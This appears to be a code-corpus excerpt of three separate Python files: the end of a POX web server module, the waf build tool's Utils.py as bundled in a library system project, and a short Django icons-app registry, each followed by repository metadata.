if handler is None: return
self.matches.append((prefix, handler, trim_prefix, args))
self.matches.sort(key=lambda e:len(e[0]),reverse=True)
def add_static_dir (self, www_path, local_path=None, relative=False):
"""
Serves a directory of static content.
www_path is the prefix of the URL that maps to this directory.
local_path is the directory to serve content from. If it's not
specified, it is assume to be a directory with the same name as
www_path.
relative, if True, means that the local path is to be a sibling
of the calling module.
For an example, see the launch() function in this module.
"""
if not www_path.startswith('/'): www_path = '/' + www_path
if local_path is None:
local_path = www_path[1:]
if relative:
local_path = os.path.basename(local_path)
if relative:
import inspect
path = inspect.stack()[1][1]
path = os.path.dirname(path)
local_path = os.path.join(path, local_path)
local_path = os.path.abspath(local_path)
log.debug("Serving %s at %s", local_path, www_path)
self.set_handler(www_path, StaticContentHandler,
{'root':local_path}, True);
def launch (address='', port=8000, static=False):
httpd = SplitThreadedServer((address, int(port)), SplitterRequestHandler)
core.register("WebServer", httpd)
httpd.set_handler("/", CoreHandler, httpd, True)
#httpd.set_handler("/foo", StaticContentHandler, {'root':'.'}, True)
#httpd.set_handler("/f", StaticContentHandler, {'root':'pox'}, True)
#httpd.set_handler("/cgis", SplitCGIRequestHandler, "pox/web/www_root")
if static is True:
httpd.add_static_dir('static', 'www_root', relative=True)
elif static is False:
pass
else:
static = static.split(",")
for entry in static:
if entry.lower() == "":
httpd.add_static_dir('static', 'www_root', relative=True)
continue
if ':' not in entry:
directory = entry
prefix = os.path.split(directory)
if prefix[1] == '':
prefix = os.path.split(prefix[0])
prefix = prefix[1]
assert prefix != ''
else:
prefix,directory = entry.split(":")
directory = os.path.expanduser(directory)
httpd.add_static_dir(prefix, directory, relative=False)
def run ():
try:
log.debug("Listening on %s:%i" % httpd.socket.getsockname())
httpd.serve_forever()
except:
pass
log.info("Server quit")
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
| mikeing2001/LoopDetection | pox/web/webcore.py | Python | gpl-3.0 | 15,662 |
#!/usr/bin/env python
# Meran - MERAN UNLP is a ILS (Integrated Library System) wich provides Catalog,
# Circulation and User's Management. It's written in Perl, and uses Apache2
# Web-Server, MySQL database and Sphinx 2 indexing.
# Copyright (C) 2009-2013 Grupo de desarrollo de Meran CeSPI-UNLP
#
# This file is part of Meran.
#
# Meran is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Meran is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Meran. If not, see <http://www.gnu.org/licenses/>.
# encoding: utf-8
# Meran - MERAN UNLP is a ILS (Integrated Library System) wich provides Catalog,
# Circulation and User's Management. It's written in Perl, and uses Apache2
# Web-Server, MySQL database and Sphinx 2 indexing.
# Copyright (C) 2009-2013 Grupo de desarrollo de Meran CeSPI-UNLP
#
# This file is part of Meran.
#
# Meran is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Meran is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Meran. If not, see <http://www.gnu.org/licenses/>.
# Thomas Nagy, 2005 (ita)
"""
Utilities, the stable ones are the following:
* h_file: compute a unique value for a file (hash), it uses
the module fnv if it is installed (see waf/utils/fnv & http://code.google.com/p/waf/wiki/FAQ)
else, md5 (see the python docs)
For large projects (projects with more than 15000 files) or slow hard disks and filesystems (HFS)
it is possible to use a hashing based on the path and the size (may give broken cache results)
The method h_file MUST raise an OSError if the file is a folder
import stat
def h_file(filename):
st = os.stat(filename)
if stat.S_ISDIR(st[stat.ST_MODE]): raise IOError('not a file')
m = Utils.md5()
m.update(str(st.st_mtime))
m.update(str(st.st_size))
m.update(filename)
return m.digest()
To replace the function in your project, use something like this:
import Utils
Utils.h_file = h_file
* h_list
* h_fun
* get_term_cols
* ordered_dict
"""
import os, sys, imp, string, errno, traceback, inspect, re, shutil, datetime, gc
# In python 3.0 we can get rid of all this
try: from UserDict import UserDict
except ImportError: from collections import UserDict
if sys.hexversion >= 0x2060000 or os.name == 'java':
import subprocess as pproc
else:
import pproc
import Logs
from Constants import *
try:
from collections import deque
except ImportError:
class deque(list):
def popleft(self):
return self.pop(0)
is_win32 = sys.platform == 'win32'
try:
# defaultdict in python 2.5
from collections import defaultdict as DefaultDict
except ImportError:
class DefaultDict(dict):
def __init__(self, default_factory):
super(DefaultDict, self).__init__()
self.default_factory = default_factory
def __getitem__(self, key):
try:
return super(DefaultDict, self).__getitem__(key)
except KeyError:
value = self.default_factory()
self[key] = value
return value
class WafError(Exception):
def __init__(self, *args):
self.args = args
try:
self.stack = traceback.extract_stack()
except:
pass
Exception.__init__(self, *args)
def __str__(self):
return str(len(self.args) == 1 and self.args[0] or self.args)
class WscriptError(WafError):
def __init__(self, message, wscript_file=None):
if wscript_file:
self.wscript_file = wscript_file
self.wscript_line = None
else:
try:
(self.wscript_file, self.wscript_line) = self.locate_error()
except:
(self.wscript_file, self.wscript_line) = (None, None)
msg_file_line = ''
if self.wscript_file:
msg_file_line = "%s:" % self.wscript_file
if self.wscript_line:
msg_file_line += "%s:" % self.wscript_line
err_message = "%s error: %s" % (msg_file_line, message)
WafError.__init__(self, err_message)
def locate_error(self):
stack = traceback.extract_stack()
stack.reverse()
for frame in stack:
file_name = os.path.basename(frame[0])
is_wscript = (file_name == WSCRIPT_FILE or file_name == WSCRIPT_BUILD_FILE)
if is_wscript:
return (frame[0], frame[1])
return (None, None)
indicator = is_win32 and '\x1b[A\x1b[K%s%s%s\r' or '\x1b[K%s%s%s\r'
try:
from fnv import new as md5
import Constants
Constants.SIG_NIL = 'signofnv'
def h_file(filename):
m = md5()
try:
m.hfile(filename)
x = m.digest()
if x is None: raise OSError("not a file")
return x
except SystemError:
raise OSError("not a file" + filename)
except ImportError:
try:
try:
from hashlib import md5
except ImportError:
from md5 import md5
def h_file(filename):
f = open(filename, 'rb')
m = md5()
while (filename):
filename = f.read(100000)
m.update(filename)
f.close()
return m.digest()
except ImportError:
# portability fixes may be added elsewhere (although, md5 should be everywhere by now)
md5 = None
class ordered_dict(UserDict):
def __init__(self, dict = None):
self.allkeys = []
UserDict.__init__(self, dict)
def __delitem__(self, key):
self.allkeys.remove(key)
UserDict.__delitem__(self, key)
def __setitem__(self, key, item):
if key not in self.allkeys: self.allkeys.append(key)
UserDict.__setitem__(self, key, item)
def exec_command(s, **kw):
if 'log' in kw:
kw['stdout'] = kw['stderr'] = kw['log']
del(kw['log'])
kw['shell'] = isinstance(s, str)
try:
proc = pproc.Popen(s, **kw)
return proc.wait()
except OSError:
return -1
if is_win32:
def exec_command(s, **kw):
if 'log' in kw:
kw['stdout'] = kw['stderr'] = kw['log']
del(kw['log'])
kw['shell'] = isinstance(s, str)
if len(s) > 2000:
startupinfo = pproc.STARTUPINFO()
startupinfo.dwFlags |= pproc.STARTF_USESHOWWINDOW
kw['startupinfo'] = startupinfo
try:
if 'stdout' not in kw:
kw['stdout'] = pproc.PIPE
kw['stderr'] = pproc.PIPE
proc = pproc.Popen(s,**kw)
(stdout, stderr) = proc.communicate()
Logs.info(stdout)
if stderr:
Logs.error(stderr)
return proc.returncode
else:
proc = pproc.Popen(s,**kw)
return proc.wait()
except OSError:
return -1
listdir = os.listdir
if is_win32:
def listdir_win32(s):
if re.match('^[A-Za-z]:$', s):
# os.path.isdir fails if s contains only the drive name... (x:)
s += os.sep
if not os.path.isdir(s):
e = OSError()
e.errno = errno.ENOENT
raise e
return os.listdir(s)
listdir = listdir_win32
def waf_version(mini = 0x010000, maxi = 0x100000):
"Halts if the waf version is wrong"
ver = HEXVERSION
try: min_val = mini + 0
except TypeError: min_val = int(mini.replace('.', '0'), 16)
if min_val > ver:
Logs.error("waf version should be at least %s (%s found)" % (mini, ver))
sys.exit(0)
try: max_val = maxi + 0
except TypeError: max_val = int(maxi.replace('.', '0'), 16)
if max_val < ver:
Logs.error("waf version should be at most %s (%s found)" % (maxi, ver))
sys.exit(0)
def python_24_guard():
if sys.hexversion < 0x20400f0 or sys.hexversion >= 0x3000000:
raise ImportError("Waf requires Python >= 2.3 but the raw source requires Python 2.4, 2.5 or 2.6")
def ex_stack():
exc_type, exc_value, tb = sys.exc_info()
if Logs.verbose > 1:
exc_lines = traceback.format_exception(exc_type, exc_value, tb)
return ''.join(exc_lines)
return str(exc_value)
def to_list(sth):
if isinstance(sth, str):
return sth.split()
else:
return sth
g_loaded_modules = {}
"index modules by absolute path"
g_module=None
"the main module is special"
def load_module(file_path, name=WSCRIPT_FILE):
"this function requires an absolute path"
try:
return g_loaded_modules[file_path]
except KeyError:
pass
module = imp.new_module(name)
try:
code = readf(file_path, m='rU')
except (IOError, OSError):
raise WscriptError('Could not read the file %r' % file_path)
module.waf_hash_val = code
sys.path.insert(0, os.path.dirname(file_path))
try:
exec(compile(code, file_path, 'exec'), module.__dict__)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
raise WscriptError("".join(traceback.format_exception(exc_type, exc_value, tb)), file_path)
sys.path.pop(0)
g_loaded_modules[file_path] = module
return module
def set_main_module(file_path):
"Load custom options, if defined"
global g_module
g_module = load_module(file_path, 'wscript_main')
g_module.root_path = file_path
try:
g_module.APPNAME
except:
g_module.APPNAME = 'noname'
try:
g_module.VERSION
except:
g_module.VERSION = '1.0'
# note: to register the module globally, use the following:
# sys.modules['wscript_main'] = g_module
def to_hashtable(s):
"used for importing env files"
tbl = {}
lst = s.split('\n')
for line in lst:
if not line: continue
mems = line.split('=')
tbl[mems[0]] = mems[1]
return tbl
def get_term_cols():
"console width"
return 80
try:
import struct, fcntl, termios
except ImportError:
pass
else:
if Logs.got_tty:
def myfun():
dummy_lines, cols = struct.unpack("HHHH", \
fcntl.ioctl(sys.stderr.fileno(),termios.TIOCGWINSZ , \
struct.pack("HHHH", 0, 0, 0, 0)))[:2]
return cols
# we actually try the function once to see if it is suitable
try:
myfun()
except:
pass
else:
get_term_cols = myfun
rot_idx = 0
rot_chr = ['\\', '|', '/', '-']
"the rotation character in the progress bar"
def split_path(path):
return path.split('/')
def split_path_cygwin(path):
if path.startswith('//'):
ret = path.split('/')[2:]
ret[0] = '/' + ret[0]
return ret
return path.split('/')
re_sp = re.compile('[/\\\\]')
def split_path_win32(path):
if path.startswith('\\\\'):
ret = re.split(re_sp, path)[2:]
ret[0] = '\\' + ret[0]
return ret
return re.split(re_sp, path)
if sys.platform == 'cygwin':
split_path = split_path_cygwin
elif is_win32:
split_path = split_path_win32
def copy_attrs(orig, dest, names, only_if_set=False):
for a in to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def def_attrs(cls, **kw):
'''
set attributes for class.
@param cls [any class]: the class to update the given attributes in.
@param kw [dictionary]: dictionary of attributes names and values.
if the given class hasn't one (or more) of these attributes, add the attribute with its value to the class.
'''
for k, v in kw.iteritems():
if not hasattr(cls, k):
setattr(cls, k, v)
def quote_define_name(path):
fu = re.compile("[^a-zA-Z0-9]").sub("_", path)
fu = fu.upper()
return fu
def quote_whitespace(path):
return (path.strip().find(' ') > 0 and '"%s"' % path or path).replace('""', '"')
def trimquotes(s):
if not s: return ''
s = s.rstrip()
if s[0] == "'" and s[-1] == "'": return s[1:-1]
return s
def h_list(lst):
m = md5()
m.update(str(lst))
return m.digest()
def h_fun(fun):
try:
return fun.code
except AttributeError:
try:
h = inspect.getsource(fun)
except IOError:
h = "nocode"
try:
fun.code = h
except AttributeError:
pass
return h
def pprint(col, str, label='', sep=os.linesep):
"print messages in color"
sys.stderr.write("%s%s%s %s%s" % (Logs.colors(col), str, Logs.colors.NORMAL, label, sep))
def check_dir(dir):
"""If a folder doesn't exists, create it."""
try:
os.stat(dir)
except OSError:
try:
os.makedirs(dir)
except OSError, e:
raise WafError("Cannot create folder '%s' (original error: %s)" % (dir, e))
def cmd_output(cmd, **kw):
silent = False
if 'silent' in kw:
silent = kw['silent']
del(kw['silent'])
if 'e' in kw:
tmp = kw['e']
del(kw['e'])
kw['env'] = tmp
kw['shell'] = isinstance(cmd, str)
kw['stdout'] = pproc.PIPE
if silent:
kw['stderr'] = pproc.PIPE
try:
p = pproc.Popen(cmd, **kw)
output = p.communicate()[0]
except OSError, e:
raise ValueError(str(e))
if p.returncode:
if not silent:
msg = "command execution failed: %s -> %r" % (cmd, str(output))
raise ValueError(msg)
output = ''
return output
reg_subst = re.compile(r"(\\\\)|(\$\$)|\$\{([^}]+)\}")
def subst_vars(expr, params):
"substitute ${PREFIX}/bin in /usr/local/bin"
def repl_var(m):
if m.group(1):
return '\\'
if m.group(2):
return '$'
try:
# environments may contain lists
return params.get_flat(m.group(3))
except AttributeError:
return params[m.group(3)]
return reg_subst.sub(repl_var, expr)
def unversioned_sys_platform_to_binary_format(unversioned_sys_platform):
"infers the binary format from the unversioned_sys_platform name."
if unversioned_sys_platform in ('linux', 'freebsd', 'netbsd', 'openbsd', 'sunos'):
return 'elf'
elif unversioned_sys_platform == 'darwin':
return 'mac-o'
elif unversioned_sys_platform in ('win32', 'cygwin', 'uwin', 'msys'):
return 'pe'
# TODO we assume all other operating systems are elf, which is not true.
# we may set this to 'unknown' and have ccroot and other tools handle the case "gracefully" (whatever that means).
return 'elf'
def unversioned_sys_platform():
"""returns an unversioned name from sys.platform.
sys.plaform is not very well defined and depends directly on the python source tree.
The version appended to the names is unreliable as it's taken from the build environment at the time python was built,
i.e., it's possible to get freebsd7 on a freebsd8 system.
So we remove the version from the name, except for special cases where the os has a stupid name like os2 or win32.
Some possible values of sys.platform are, amongst others:
aix3 aix4 atheos beos5 darwin freebsd2 freebsd3 freebsd4 freebsd5 freebsd6 freebsd7
generic irix5 irix6 linux2 mac netbsd1 next3 os2emx riscos sunos5 unixware7
Investigating the python source tree may reveal more values.
"""
s = sys.platform
if s == 'java':
# The real OS is hidden under the JVM.
from java.lang import System
s = System.getProperty('os.name')
# see http://lopica.sourceforge.net/os.html for a list of possible values
if s == 'Mac OS X':
return 'darwin'
elif s.startswith('Windows '):
return 'win32'
elif s == 'OS/2':
return 'os2'
elif s == 'HP-UX':
return 'hpux'
elif s in ('SunOS', 'Solaris'):
return 'sunos'
else: s = s.lower()
if s == 'win32' or s.endswith('os2') and s != 'sunos2': return s
return re.split('\d+$', s)[0]
#@deprecated('use unversioned_sys_platform instead')
def detect_platform():
"""this function has been in the Utils module for some time.
It's hard to guess what people have used it for.
It seems its goal is to return an unversionned sys.platform, but it's not handling all platforms.
For example, the version is not removed on freebsd and netbsd, amongst others.
"""
s = sys.platform
# known POSIX
for x in 'cygwin linux irix sunos hpux aix darwin'.split():
# sys.platform may be linux2
if s.find(x) >= 0:
return x
# unknown POSIX
if os.name in 'posix java os2'.split():
return os.name
return s
def load_tool(tool, tooldir=None):
'''
load_tool: import a Python module, optionally using several directories.
@param tool [string]: name of tool to import.
@param tooldir [list]: directories to look for the tool.
@return: the loaded module.
Warning: this function is not thread-safe: plays with sys.path,
so must run in sequence.
'''
if tooldir:
assert isinstance(tooldir, list)
sys.path = tooldir + sys.path
try:
try:
return __import__(tool)
except ImportError, e:
Logs.error('Could not load the tool %r in %r:\n%s' % (tool, sys.path, e))
raise
finally:
if tooldir:
sys.path = sys.path[len(tooldir):]
def readf(fname, m='r'):
"get the contents of a file, it is not used anywhere for the moment"
f = open(fname, m)
try:
txt = f.read()
finally:
f.close()
return txt
def nada(*k, **kw):
"""A function that does nothing"""
pass
def diff_path(top, subdir):
"""difference between two absolute paths"""
top = os.path.normpath(top).replace('\\', '/').split('/')
subdir = os.path.normpath(subdir).replace('\\', '/').split('/')
if len(top) == len(subdir): return ''
diff = subdir[len(top) - len(subdir):]
return os.path.join(*diff)
class Context(object):
"""A base class for commands to be executed from Waf scripts"""
def set_curdir(self, dir):
self.curdir_ = dir
def get_curdir(self):
try:
return self.curdir_
except AttributeError:
self.curdir_ = os.getcwd()
return self.get_curdir()
curdir = property(get_curdir, set_curdir)
def recurse(self, dirs, name=''):
"""The function for calling scripts from folders, it tries to call wscript + function_name
and if that file does not exist, it will call the method 'function_name' from a file named wscript
the dirs can be a list of folders or a string containing space-separated folder paths
"""
if not name:
name = inspect.stack()[1][3]
if isinstance(dirs, str):
dirs = to_list(dirs)
for x in dirs:
if os.path.isabs(x):
nexdir = x
else:
nexdir = os.path.join(self.curdir, x)
base = os.path.join(nexdir, WSCRIPT_FILE)
file_path = base + '_' + name
try:
txt = readf(file_path, m='rU')
except (OSError, IOError):
try:
module = load_module(base)
except OSError:
raise WscriptError('No such script %s' % base)
try:
f = module.__dict__[name]
except KeyError:
raise WscriptError('No function %s defined in %s' % (name, base))
if getattr(self.__class__, 'pre_recurse', None):
self.pre_recurse(f, base, nexdir)
old = self.curdir
self.curdir = nexdir
try:
f(self)
finally:
self.curdir = old
if getattr(self.__class__, 'post_recurse', None):
self.post_recurse(module, base, nexdir)
else:
dc = {'ctx': self}
if getattr(self.__class__, 'pre_recurse', None):
dc = self.pre_recurse(txt, file_path, nexdir)
old = self.curdir
self.curdir = nexdir
try:
try:
exec(compile(txt, file_path, 'exec'), dc)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
raise WscriptError("".join(traceback.format_exception(exc_type, exc_value, tb)), base)
finally:
self.curdir = old
if getattr(self.__class__, 'post_recurse', None):
self.post_recurse(txt, file_path, nexdir)
if is_win32:
old = shutil.copy2
def copy2(src, dst):
old(src, dst)
shutil.copystat(src, src)
setattr(shutil, 'copy2', copy2)
def zip_folder(dir, zip_file_name, prefix):
"""
prefix represents the app to add in the archive
"""
import zipfile
zip = zipfile.ZipFile(zip_file_name, 'w', compression=zipfile.ZIP_DEFLATED)
base = os.path.abspath(dir)
if prefix:
if prefix[-1] != os.sep:
prefix += os.sep
n = len(base)
for root, dirs, files in os.walk(base):
for f in files:
archive_name = prefix + root[n:] + os.sep + f
zip.write(root + os.sep + f, archive_name, zipfile.ZIP_DEFLATED)
zip.close()
def get_elapsed_time(start):
"Format a time delta (datetime.timedelta) using the format DdHhMmS.MSs"
delta = datetime.datetime.now() - start
# cast to int necessary for python 3.0
days = int(delta.days)
hours = int(delta.seconds / 3600)
minutes = int((delta.seconds - hours * 3600) / 60)
seconds = delta.seconds - hours * 3600 - minutes * 60 \
+ float(delta.microseconds) / 1000 / 1000
result = ''
if days:
result += '%dd' % days
if days or hours:
result += '%dh' % hours
if days or hours or minutes:
result += '%dm' % minutes
return '%s%.3fs' % (result, seconds)
if os.name == 'java':
# For Jython (they should really fix the inconsistency)
try:
gc.disable()
gc.enable()
except NotImplementedError:
gc.disable = gc.enable | Desarrollo-CeSPI/meran | dev-plugins/node64/lib/node/wafadmin/Utils.py | Python | gpl-3.0 | 20,212 |
from __future__ import absolute_import
from django.utils.translation import ugettext_lazy as _
from smart_settings import LocalScope
from .icons import icon_icons_app
from .literals import DEFAULT_ICON_SET
name = 'icons'
label = _(u'Icons')
description = _(u'Handles the registration and rendering of icons and sprites.')
dependencies = ['app_registry']
icon = icon_icons_app
settings = [
{
'name': 'ICON_SET',
'default': DEFAULT_ICON_SET,
'description': _(u'Icon set to use to render all the icon in the project.'),
'scopes': [LocalScope()] # TODO: Cluster, Org, User
}
]
| rosarior/rua | rua/apps/icons/registry.py | Python | gpl-3.0 | 617 |